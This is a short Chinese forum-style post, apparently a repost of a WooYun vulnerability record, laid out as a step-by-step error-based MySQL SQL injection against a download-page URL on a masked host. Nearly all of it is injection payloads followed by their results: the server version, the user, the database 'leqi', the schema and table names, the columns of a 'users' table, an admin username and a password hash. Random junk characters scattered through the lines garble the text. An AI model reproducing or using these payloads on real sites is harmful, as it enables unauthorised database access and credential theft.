http://www.wooyun.org/bugs/wooyun-2010-01666: G3 R6 ~4 e; I, d, \7 v
% e! x% u1 u! O* Z; b8 k j之前想找个测试 没想到这有 可以测试下做个记录而已 1 M' F6 n! T9 j p7 q; J
3 a+ M! S: p) E* W$ V+ S5 z0 j0 O, ]http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
/ ~6 ^$ o0 D6 ? M1 F; _. O( k# I
/data0/htdocs/leqi_new/app/myapp.php# `& X$ S2 j) U0 b
0 v1 C6 O: C6 _7 g9 P
或者
$ t8 Q: I0 f2 w! g/ m* O9 T: |3 C9 W2 \' I
/**********version()**********/ 5.1.49-log
* J; [& Y4 F/ [http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003: ~. `" V3 i- M
1 \& j: }$ V& B! v; ]+ @! F
/**********user()**********/ 6 a( v v( b4 G
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0030 m8 C3 @6 z- C- q+ ~* M
1 P3 w: b h6 P* E; P: M/**********database()**********/ leqi
: ^) { Z+ q- B9 lhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0031 K- P/ D3 D6 j, M: t
, @; |- g# `0 ?/ O/**********limit依次递归爆库**********/
$ n1 q) w- `1 g6 Vhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0031 k4 Z: `' C1 j4 }/ p* x
information_schema
% v' u# m, Z# Lhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0038 A$ q7 c& C; S, @. w% b; c
leqi0 x8 ]' m3 S' ^) A- E2 ?$ Z8 v
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003- D# s! K+ t' }1 X4 {
test
8 `$ R0 r( y& o
! c" T: ~: n, e/**********limit依次递归爆表名**********/9 w6 i; A! N3 ~. A; [0 x) o
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
: Z F& r3 I1 y( e( F; \; f' m2 eusers
) y+ k) f- y8 D; Z. w) g3 `/ Q( v* y) f( N# N- j9 M, ^. z
/**********limit依次递归爆字段名**********/
( ?5 F/ A7 A: Q `5 Nhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0031 ]0 H/ b4 C* S# P8 s
user_id,username,nickname,passwd,group_id* F1 l1 o+ N3 Z& K$ A; [
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
) }7 A: }" D$ B$ B/wapc/5000_0005_003. D$ H+ R# U, c! e
11 21
: \- E) o- a8 s! O+ M. Bhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
' }$ r* _# o( C* @8 T/wapc/5000_0005_003
0 V3 i( P# r/ q( _* i# U11 341 351 361
) M% @; c* q ~& ^8 l2 t* o& Q& B/**********爆数据**********/: b" o7 _0 j$ [/ R0 M7 Y4 x
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
5 j: H y* q* d) z& Gadmin
H' D+ @" P F* U( @0 T6 X! A$ ]http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%231 y5 h8 X2 a7 _) B7 g3 R# ]
6a8b4574ca231eb8bd52764d4978ffcd
4 D* a6 [8 v( E* \8 s4 o9 |5 D2 @
, }; W J9 `+ s i
1 m. ]0 e' ?# _" H |